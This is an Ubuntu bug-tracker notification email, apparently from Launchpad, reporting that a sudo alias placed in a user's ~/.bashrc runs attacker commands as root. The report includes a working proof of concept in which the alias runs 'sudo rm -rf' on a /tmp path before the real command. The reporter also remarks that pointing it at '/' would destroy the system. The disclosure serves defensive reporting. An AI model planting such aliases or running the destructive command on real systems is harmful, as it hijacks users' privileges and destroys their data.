*** This bug is a security vulnerability ***
You have been subscribed to a public security bug by Seth Arnold (seth-arnold):
Put the alias below in ~/.bashrc, which is writable by the current user
and wait for the user to open up a shell and become root.
There are numerous of possibilities. If you exchange
"/tmp/aBSoLuTLYNoTHiNG" to "/" it becomes dangerous. Or imagine an
attacker that can't become a root in any other way and wants to setup a
botnet.
$ alias sudo='function f() { sudo -- rm -rf "/tmp/aBSoLuTLYNoTHiNG" ; sudo
touch "/tmp/aBSoLuTLYNoTHiNG" ; echo "Everything removed!!" ; sudo "$@" ; } ;
f "$@"'
$ stat /tmp/aBSoLuTLYNoTHiNG
stat: cannot stat '/tmp/aBSoLuTLYNoTHiNG': No such file or directory
$ sudo echo 'hello wonderful world!'
Everything removed!!
hello wonderful world!
$ stat /tmp/aBSoLuTLYNoTHiNG
File: /tmp/aBSoLuTLYNoTHiNG
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd00h/64768d Inode: 4718664 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2020-08-27 18:09:50.960080579 +0200
Modify: 2020-08-27 18:09:50.960080579 +0200
Change: 2020-08-27 18:09:50.960080579 +0200
Birth: -
File written by root! Fastest fix: Sudo is not allowed to be an alias.
Extra information:
$ lsb_release -rd
Description: Ubuntu 20.04.1 LTS
Release: 20.04
** Affects: bash (Ubuntu)
Importance: Undecided
Status: New
--
attack alias sudo with nasty payload
https://bugs.launchpad.net/bugs/1893241
You received this bug notification because you are a member of Ubuntu Bugs,
which is subscribed to the bug report.
--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
